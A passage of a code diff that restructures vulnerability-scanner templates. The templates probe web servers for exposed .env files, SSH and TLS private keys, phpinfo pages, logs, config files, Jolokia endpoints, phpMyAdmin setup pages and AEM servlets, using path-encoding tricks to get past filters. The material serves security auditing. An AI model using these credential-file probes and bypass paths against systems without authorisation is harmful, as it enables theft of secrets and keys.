- "{{BaseURL}}/.env.local" - "/.env.prod.local"
- "{{BaseURL}}/.env.example" - "/.env.production"
- "{{BaseURL}}/.env.stage" - "/.env.production.local"
- "{{BaseURL}}/.env.live" - "/.env.local"
- "{{BaseURL}}/.env.backup" - "/.env.example"
- "{{BaseURL}}/.env.save" - "/.env.stage"
- "{{BaseURL}}/.env.old" - "/.env.live"
- "{{BaseURL}}/.env.www" - "/.env.backup"
- "{{BaseURL}}/.env_1" - "/.env.save"
- "{{BaseURL}}/.env_sample" - "/.env.old"
- "{{BaseURL}}/.env.{{DN}}" - "/.env.www"
- "{{BaseURL}}/.env.{{SD}}" - "/.env_1"
- "{{BaseURL}}/api/.env" - "/.env_sample"
- "/.env.{{DN}}"
- "/.env.{{SD}}"
- "/api/.env"
matchers-condition: and matchers-condition: and
matchers: matchers:

53
http/exposures/configs/phpinfo-files.yaml
View File

@ -16,31 +16,34 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/php.php" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/php2.php" payloads:
- "{{BaseURL}}/phpinfo.php" paths:
- "{{BaseURL}}/info.php" - "/php.php"
- "{{BaseURL}}/infophp.php" - "/php2.php"
- "{{BaseURL}}/php_info.php" - "/phpinfo.php"
- "{{BaseURL}}/test.php" - "/info.php"
- "{{BaseURL}}/i.php" - "/infophp.php"
- "{{BaseURL}}/p.php" - "/php_info.php"
- "{{BaseURL}}/pi.php" - "/test.php"
- "{{BaseURL}}/asdf.php" - "/i.php"
- "{{BaseURL}}/pinfo.php" - "/p.php"
- "{{BaseURL}}/phpversion.php" - "/pi.php"
- "{{BaseURL}}/time.php" - "/asdf.php"
- "{{BaseURL}}/index.php" - "/pinfo.php"
- "{{BaseURL}}/temp.php" - "/phpversion.php"
- "{{BaseURL}}/old_phpinfo.php" - "/time.php"
- "{{BaseURL}}/infos.php" - "/index.php"
- "{{BaseURL}}/linusadmin-phpinfo.php" - "/temp.php"
- "{{BaseURL}}/php-info.php" - "/old_phpinfo.php"
- "{{BaseURL}}/dashboard/phpinfo.php" - "/infos.php"
- "{{BaseURL}}/_profiler/phpinfo.php" - "/linusadmin-phpinfo.php"
- "{{BaseURL}}/_profiler/phpinfo" - "/php-info.php"
- "{{BaseURL}}/?phpinfo=1" - "/dashboard/phpinfo.php"
- "{{BaseURL}}/l.php?act=phpinfo" - "/_profiler/phpinfo.php"
- "/_profiler/phpinfo"
- "/?phpinfo=1"
- "/l.php?act=phpinfo"
stop-at-first-match: true stop-at-first-match: true

93
http/exposures/configs/server-private-keys.yaml
View File

@ -16,51 +16,54 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/localhost.key" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/host.key" payloads:
- "{{BaseURL}}/www.key" paths:
- "{{BaseURL}}/private-key" - "/localhost.key"
- "{{BaseURL}}/privatekey.key" - "/host.key"
- "{{BaseURL}}/server.key" - "/www.key"
- "{{BaseURL}}/my.key" - "/private-key"
- "{{BaseURL}}/key.pem" - "/privatekey.key"
- "{{BaseURL}}/ssl/localhost.key" - "/server.key"
- "{{BaseURL}}/ssl/{{Hostname}}.key" - "/my.key"
- "{{BaseURL}}/id_rsa" - "/key.pem"
- "{{BaseURL}}/id_dsa" - "/ssl/localhost.key"
- "{{BaseURL}}/id_rsa_1024" - "/ssl/{{Hostname}}.key"
- "{{BaseURL}}/id_rsa_2048" - "/id_rsa"
- "{{BaseURL}}/id_rsa_3072" - "/id_dsa"
- "{{BaseURL}}/id_rsa_4096" - "/id_rsa_1024"
- "{{BaseURL}}/.ssh/id_rsa" - "/id_rsa_2048"
- "{{BaseURL}}/.ssh/id_dsa" - "/id_rsa_3072"
- "{{BaseURL}}/.ssh/id_rsa_1024" - "/id_rsa_4096"
- "{{BaseURL}}/.ssh/id_rsa_2048" - "/.ssh/id_rsa"
- "{{BaseURL}}/.ssh/id_rsa_3072" - "/.ssh/id_dsa"
- "{{BaseURL}}/.ssh/id_rsa_4096" - "/.ssh/id_rsa_1024"
- "{{BaseURL}}/{{Hostname}}.key" - "/.ssh/id_rsa_2048"
- "{{BaseURL}}/{{Hostname}}.pem" - "/.ssh/id_rsa_3072"
- "{{BaseURL}}/config/jwt/private.pem" - "/.ssh/id_rsa_4096"
- "{{BaseURL}}/jwt/private.pem" - "/{{Hostname}}.key"
- "{{BaseURL}}/var/jwt/private.pem" - "/{{Hostname}}.pem"
- "{{BaseURL}}/private.pem" - "/config/jwt/private.pem"
- "{{BaseURL}}/ssl.txt" - "/jwt/private.pem"
- "{{BaseURL}}/ssl_key.txt" - "/var/jwt/private.pem"
- "{{BaseURL}}/certificates/{{Host}}.pfx" - "/private.pem"
- "{{BaseURL}}/certificates/{{Host}}.p12" - "/ssl.txt"
- "{{BaseURL}}/ssl/{{Host}}.pem" - "/ssl_key.txt"
- "{{BaseURL}}/ssl/{{Host}}_key.txt" - "/certificates/{{Host}}.pfx"
- "{{BaseURL}}/cert/{{Host}}_key.txt" - "/certificates/{{Host}}.p12"
- "{{BaseURL}}/cert/{{RDN}}_key.txt" - "/ssl/{{Host}}.pem"
- "{{BaseURL}}/cert/{{Host}}.txt" - "/ssl/{{Host}}_key.txt"
- "{{BaseURL}}/ssl/private/{{Host}}_key.pem" - "/cert/{{Host}}_key.txt"
- "{{BaseURL}}/certs/{{Host}}_private.key" - "/cert/{{RDN}}_key.txt"
- "{{BaseURL}}/certs/{{Host}}.key" - "/cert/{{Host}}.txt"
- "{{BaseURL}}/certificates/{{Host}}_priv.pem" - "/ssl/private/{{Host}}_key.pem"
- "{{BaseURL}}/certificates/{{Host}}_privkey.pem" - "/certs/{{Host}}_private.key"
- "{{BaseURL}}/certs/{{Host}}.pem" - "/certs/{{Host}}.key"
- "{{BaseURL}}/private/{{Host}}.key" - "/certificates/{{Host}}_priv.pem"
- "{{BaseURL}}/keys/{{Host}}.pem" - "/certificates/{{Host}}_privkey.pem"
- "/certs/{{Host}}.pem"
- "/private/{{Host}}.key"
- "/keys/{{Host}}.pem"
stop-at-first-match: true stop-at-first-match: true

29
http/exposures/configs/zend-config-file.yaml
View File

@ -12,19 +12,22 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/application/configs/application.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/admin/configs/application.ini" payloads:
- "{{BaseURL}}/application.ini" paths:
- "{{BaseURL}}/aplicacao/application/configs/application.ini" - "/application/configs/application.ini"
- "{{BaseURL}}/cloudexp/application/configs/application.ini" - "/admin/configs/application.ini"
- "{{BaseURL}}/cms/application/configs/application.ini" - "/application.ini"
- "{{BaseURL}}/moto/application/configs/application.ini" - "/aplicacao/application/configs/application.ini"
- "{{BaseURL}}/Partners/application/configs/application.ini" - "/cloudexp/application/configs/application.ini"
- "{{BaseURL}}/radio/application/configs/application.ini" - "/cms/application/configs/application.ini"
- "{{BaseURL}}/seminovos/application/configs/application.ini" - "/moto/application/configs/application.ini"
- "{{BaseURL}}/shop/application/configs/application.ini" - "/Partners/application/configs/application.ini"
- "{{BaseURL}}/site_cg/application/configs/application.ini" - "/radio/application/configs/application.ini"
- "{{BaseURL}}/slr/application/configs/application.ini" - "/seminovos/application/configs/application.ini"
- "/shop/application/configs/application.ini"
- "/site_cg/application/configs/application.ini"
- "/slr/application/configs/application.ini"
stop-at-first-match: true stop-at-first-match: true

33
http/exposures/files/routes-ini.yaml
View File

@ -14,21 +14,24 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/routes.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/config/routes.ini" payloads:
- "{{BaseURL}}/admin/configs/routes.ini" paths:
- "{{BaseURL}}/application/configs/routes.ini" - "/routes.ini"
- "{{BaseURL}}/aplicacao/routes/configs/routes.ini" - "/config/routes.ini"
- "{{BaseURL}}/routes/configs/routes.ini" - "/admin/configs/routes.ini"
- "{{BaseURL}}/cloudexp/routes/configs/routes.ini" - "/application/configs/routes.ini"
- "{{BaseURL}}/cms/routes/configs/routes.ini" - "/aplicacao/routes/configs/routes.ini"
- "{{BaseURL}}/moto/routes/configs/routes.ini" - "/routes/configs/routes.ini"
- "{{BaseURL}}/Partners/routes/configs/routes.ini" - "/cloudexp/routes/configs/routes.ini"
- "{{BaseURL}}/radio/routes/configs/routes.ini" - "/cms/routes/configs/routes.ini"
- "{{BaseURL}}/seminovos/routes/configs/routes.ini" - "/moto/routes/configs/routes.ini"
- "{{BaseURL}}/shop/routes/configs/routes.ini" - "/Partners/routes/configs/routes.ini"
- "{{BaseURL}}/site_cg/routes/configs/routes.ini" - "/radio/routes/configs/routes.ini"
- "{{BaseURL}}/slr/routes/configs/routes.ini" - "/seminovos/routes/configs/routes.ini"
- "/shop/routes/configs/routes.ini"
- "/site_cg/routes/configs/routes.ini"
- "/slr/routes/configs/routes.ini"
stop-at-first-match: true stop-at-first-match: true

57
http/exposures/files/shellscripts.yaml
View File

@ -12,33 +12,36 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.build.sh" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.jenkins.sh" payloads:
- "{{BaseURL}}/.travis.sh" paths:
- "{{BaseURL}}/install.sh" - "/.build.sh"
- "{{BaseURL}}/update.sh" - "/.jenkins.sh"
- "{{BaseURL}}/upload.sh" - "/.travis.sh"
- "{{BaseURL}}/config.sh" - "/install.sh"
- "{{BaseURL}}/build.sh" - "/update.sh"
- "{{BaseURL}}/setup.sh" - "/upload.sh"
- "{{BaseURL}}/run.sh" - "/config.sh"
- "{{BaseURL}}/backup.sh" - "/build.sh"
- "{{BaseURL}}/compile.sh" - "/setup.sh"
- "{{BaseURL}}/env.sh" - "/run.sh"
- "{{BaseURL}}/init.sh" - "/backup.sh"
- "{{BaseURL}}/startup.sh" - "/compile.sh"
- "{{BaseURL}}/wp-setup.sh" - "/env.sh"
- "{{BaseURL}}/deploy.sh" - "/init.sh"
- "{{BaseURL}}/aws.sh" - "/startup.sh"
- "{{BaseURL}}/reminder.sh" - "/wp-setup.sh"
- "{{BaseURL}}/mysqlbackup.sh" - "/deploy.sh"
- "{{BaseURL}}/dev2local.sh" - "/aws.sh"
- "{{BaseURL}}/local2dev.sh" - "/reminder.sh"
- "{{BaseURL}}/local2prod.sh" - "/mysqlbackup.sh"
- "{{BaseURL}}/prod2local.sh" - "/dev2local.sh"
- "{{BaseURL}}/rsync.sh" - "/local2dev.sh"
- "{{BaseURL}}/sync.sh" - "/local2prod.sh"
- "{{BaseURL}}/test.sh" - "/prod2local.sh"
- "/rsync.sh"
- "/sync.sh"
- "/test.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:

61
http/exposures/logs/error-logs.yaml
View File

@ -12,35 +12,38 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/php_errors.log" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/MyErrors.log" payloads:
- "{{BaseURL}}/admin/error.log" paths:
- "{{BaseURL}}/admin/errors.log" - "/php_errors.log"
- "{{BaseURL}}/admin/log/error.log" - "/MyErrors.log"
- "{{BaseURL}}/admin/logs/error.log" - "/admin/error.log"
- "{{BaseURL}}/admin/logs/errors.log" - "/admin/errors.log"
- "{{BaseURL}}/application/logs/application.log" - "/admin/log/error.log"
- "{{BaseURL}}/application/logs/default.log" - "/admin/logs/error.log"
- "{{BaseURL}}/config/error_log" - "/admin/logs/errors.log"
- "{{BaseURL}}/error.log" - "/application/logs/application.log"
- "{{BaseURL}}/error.txt" - "/application/logs/default.log"
- "{{BaseURL}}/error/error.log" - "/config/error_log"
- "{{BaseURL}}/error_log" - "/error.log"
- "{{BaseURL}}/error_log.txt" - "/error.txt"
- "{{BaseURL}}/errors.log" - "/error/error.log"
- "{{BaseURL}}/errors.txt" - "/error_log"
- "{{BaseURL}}/errors/errors.log" - "/error_log.txt"
- "{{BaseURL}}/errors_log" - "/errors.log"
- "{{BaseURL}}/log.log" - "/errors.txt"
- "{{BaseURL}}/log.txt" - "/errors/errors.log"
- "{{BaseURL}}/log/error.log" - "/errors_log"
- "{{BaseURL}}/log/errors.log" - "/log.log"
- "{{BaseURL}}/logs.txt" - "/log.txt"
- "{{BaseURL}}/logs/error.log" - "/log/error.log"
- "{{BaseURL}}/logs/errors.log" - "/log/errors.log"
- "{{BaseURL}}/routes/error_log" - "/logs.txt"
- "{{BaseURL}}/{{Hostname}}/error.log" - "/logs/error.log"
- "{{BaseURL}}/{{Hostname}}/errors.log" - "/logs/errors.log"
- "/routes/error_log"
- "/{{Hostname}}/error.log"
- "/{{Hostname}}/errors.log"
stop-at-first-match: true stop-at-first-match: true

131
http/misconfiguration/aem/aem-default-get-servlet.yaml
View File

@ -16,70 +16,73 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/etc' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/var' payloads:
- '{{BaseURL}}/apps' paths:
- '{{BaseURL}}/home' - "/etc"
- '{{BaseURL}}///etc' - "/var"
- '{{BaseURL}}///var' - "/apps"
- '{{BaseURL}}///apps' - "/home"
- '{{BaseURL}}///home' - "///etc"
- '{{BaseURL}}/.json' - "///var"
- '{{BaseURL}}/.1.json' - "///apps"
- '{{BaseURL}}/....4.2.1....json' - "///home"
- '{{BaseURL}}/.json?FNZ.css' - "/.json"
- '{{BaseURL}}/.json?FNZ.ico' - "/.1.json"
- '{{BaseURL}}/.json?FNZ.html' - "/....4.2.1....json"
- '{{BaseURL}}/.json/FNZ.css' - "/.json?FNZ.css"
- '{{BaseURL}}/.json/FNZ.html' - "/.json?FNZ.ico"
- '{{BaseURL}}/.json/FNZ.png' - "/.json?FNZ.html"
- '{{BaseURL}}/.json/FNZ.ico' - "/.json/FNZ.css"
- '{{BaseURL}}/.children.1.json' - "/.json/FNZ.html"
- '{{BaseURL}}/.children....4.2.1....json' - "/.json/FNZ.png"
- '{{BaseURL}}/.children.json?FNZ.css' - "/.json/FNZ.ico"
- '{{BaseURL}}/.children.json?FNZ.ico' - "/.children.1.json"
- '{{BaseURL}}/.children.json?FNZ.html' - "/.children....4.2.1....json"
- '{{BaseURL}}/.children.json/FNZ.css' - "/.children.json?FNZ.css"
- '{{BaseURL}}/.children.json/FNZ.html' - "/.children.json?FNZ.ico"
- '{{BaseURL}}/.children.json/FNZ.png' - "/.children.json?FNZ.html"
- '{{BaseURL}}/.children.json/FNZ.ico' - "/.children.json/FNZ.css"
- '{{BaseURL}}/etc.json' - "/.children.json/FNZ.html"
- '{{BaseURL}}/etc.1.json' - "/.children.json/FNZ.png"
- '{{BaseURL}}/etc....4.2.1....json' - "/.children.json/FNZ.ico"
- '{{BaseURL}}/etc.json?FNZ.css' - "/etc.json"
- '{{BaseURL}}/etc.json?FNZ.ico' - "/etc.1.json"
- '{{BaseURL}}/etc.json?FNZ.html' - "/etc....4.2.1....json"
- '{{BaseURL}}/etc.json/FNZ.css' - "/etc.json?FNZ.css"
- '{{BaseURL}}/etc.json/FNZ.html' - "/etc.json?FNZ.ico"
- '{{BaseURL}}/etc.json/FNZ.ico' - "/etc.json?FNZ.html"
- '{{BaseURL}}/etc.children.json' - "/etc.json/FNZ.css"
- '{{BaseURL}}/etc.children.1.json' - "/etc.json/FNZ.html"
- '{{BaseURL}}/etc.children....4.2.1....json' - "/etc.json/FNZ.ico"
- '{{BaseURL}}/etc.children.json?FNZ.css' - "/etc.children.json"
- '{{BaseURL}}/etc.children.json?FNZ.ico' - "/etc.children.1.json"
- '{{BaseURL}}/etc.children.json?FNZ.html' - "/etc.children....4.2.1....json"
- '{{BaseURL}}/etc.children.json/FNZ.css' - "/etc.children.json?FNZ.css"
- '{{BaseURL}}/etc.children.json/FNZ.html' - "/etc.children.json?FNZ.ico"
- '{{BaseURL}}/etc.children.json/FNZ.png' - "/etc.children.json?FNZ.html"
- '{{BaseURL}}/etc.children.json/FNZ.ico' - "/etc.children.json/FNZ.css"
- '{{BaseURL}}///etc.json' - "/etc.children.json/FNZ.html"
- '{{BaseURL}}///etc.1.json' - "/etc.children.json/FNZ.png"
- '{{BaseURL}}///etc....4.2.1....json' - "/etc.children.json/FNZ.ico"
- '{{BaseURL}}///etc.json?FNZ.css' - "///etc.json"
- '{{BaseURL}}///etc.json?FNZ.ico' - "///etc.1.json"
- '{{BaseURL}}///etc.json/FNZ.html' - "///etc....4.2.1....json"
- '{{BaseURL}}///etc.json/FNZ.png' - "///etc.json?FNZ.css"
- '{{BaseURL}}///etc.json/FNZ.ico' - "///etc.json?FNZ.ico"
- '{{BaseURL}}///etc.children.json' - "///etc.json/FNZ.html"
- '{{BaseURL}}///etc.children.1.json' - "///etc.json/FNZ.png"
- '{{BaseURL}}///etc.children....4.2.1....json' - "///etc.json/FNZ.ico"
- '{{BaseURL}}///etc.children.json?FNZ.css' - "///etc.children.json"
- '{{BaseURL}}///etc.children.json?FNZ.ico' - "///etc.children.1.json"
- '{{BaseURL}}///etc.children.json?FNZ.html' - "///etc.children....4.2.1....json"
- '{{BaseURL}}///etc.children.json/FNZ.css' - "///etc.children.json?FNZ.css"
- '{{BaseURL}}///etc.children.json/FNZ.html' - "///etc.children.json?FNZ.ico"
- '{{BaseURL}}///etc.children.json/FNZ.png' - "///etc.children.json?FNZ.html"
- '{{BaseURL}}///etc.children.json/FNZ.ico' - "///etc.children.json/FNZ.css"
- "///etc.children.json/FNZ.html"
- "///etc.children.json/FNZ.png"
- "///etc.children.json/FNZ.ico"
stop-at-first-match: true stop-at-first-match: true

61
http/misconfiguration/aem/aem-gql-servlet.yaml
View File

@ -15,35 +15,38 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' payloads:
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' paths:
- '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico"
- '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix="
stop-at-first-match: true stop-at-first-match: true

21
http/misconfiguration/aem/aem-misc-admin.yaml
View File

@ -18,15 +18,18 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/miscadmin" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/mcmadmin#/content/dashboard" payloads:
- "{{BaseURL}}/miscadmin#/etc/mobile" paths:
- "{{BaseURL}}/miscadmin#/etc/segmentation" - "/miscadmin"
- "{{BaseURL}}/miscadmin#/etc/blueprints" - "/mcmadmin#/content/dashboard"
- "{{BaseURL}}/miscadmin#/etc/designs" - "/miscadmin#/etc/mobile"
- "{{BaseURL}}/miscadmin#/etc/importers" - "/miscadmin#/etc/segmentation"
- "{{BaseURL}}/miscadmin#/etc/reports" - "/miscadmin#/etc/blueprints"
- "{{BaseURL}}/miscadmin#/etc/msm/rolloutconfigs" - "/miscadmin#/etc/designs"
- "/miscadmin#/etc/importers"
- "/miscadmin#/etc/reports"
- "/miscadmin#/etc/msm/rolloutconfigs"
stop-at-first-match: true stop-at-first-match: true

35
http/misconfiguration/jolokia/jolokia-info-disclosure.yaml
View File

@ -15,22 +15,25 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor" payloads:
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion" paths:
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
- "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
- "{{BaseURL}}/jolokia/read/java.lang:type=Memory" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor" - "/actuator/jolokia/read/java.lang:type=Memory"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion" - "/jolokia/read/java.lang:type=Memory"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
- "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
- "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
- "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
matchers-condition: or matchers-condition: or
matchers: matchers:

23
http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml
View File

@ -16,16 +16,19 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/pma/server_import.php" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/phpmyadmin/server_import.php" payloads:
- "{{BaseURL}}/phpMyAdmin 2/server_import.php" paths:
- "{{BaseURL}}/db/server_import.php" - "/pma/server_import.php"
- "{{BaseURL}}/server_import.php" - "/phpmyadmin/server_import.php"
- "{{BaseURL}}/PMA/server_import.php" - "/phpMyAdmin 2/server_import.php"
- "{{BaseURL}}/admin/server_import.php" - "/db/server_import.php"
- "{{BaseURL}}/admin/pma/server_import.php" - "/server_import.php"
- "{{BaseURL}}/phpMyAdmin/server_import.php" - "/PMA/server_import.php"
- "{{BaseURL}}/admin/phpMyAdmin/server_import.php" - "/admin/server_import.php"
- "/admin/pma/server_import.php"
- "/phpMyAdmin/server_import.php"
- "/admin/phpMyAdmin/server_import.php"
stop-at-first-match: true stop-at-first-match: true

35
http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml
View File

@ -18,22 +18,25 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/phpmyadmin/scripts/setup.php" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/phpMyAdmin/scripts/setup.php" payloads:
- "{{BaseURL}}/_phpmyadmin/scripts/setup.php" paths:
- "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" - "/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" - "/phpMyAdmin/scripts/setup.php"
- "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" - "/_phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" - "/forum/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" - "/php/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" - "/typo3/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/phpmyadmin/setup/index.php" - "/web/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/pma/setup/index.php" - "/xampp/phpmyadmin/scripts/setup.php"
- "{{BaseURL}}/admin/pma/setup/index.php" - "/sysadmin/phpMyAdmin/scripts/setup.php"
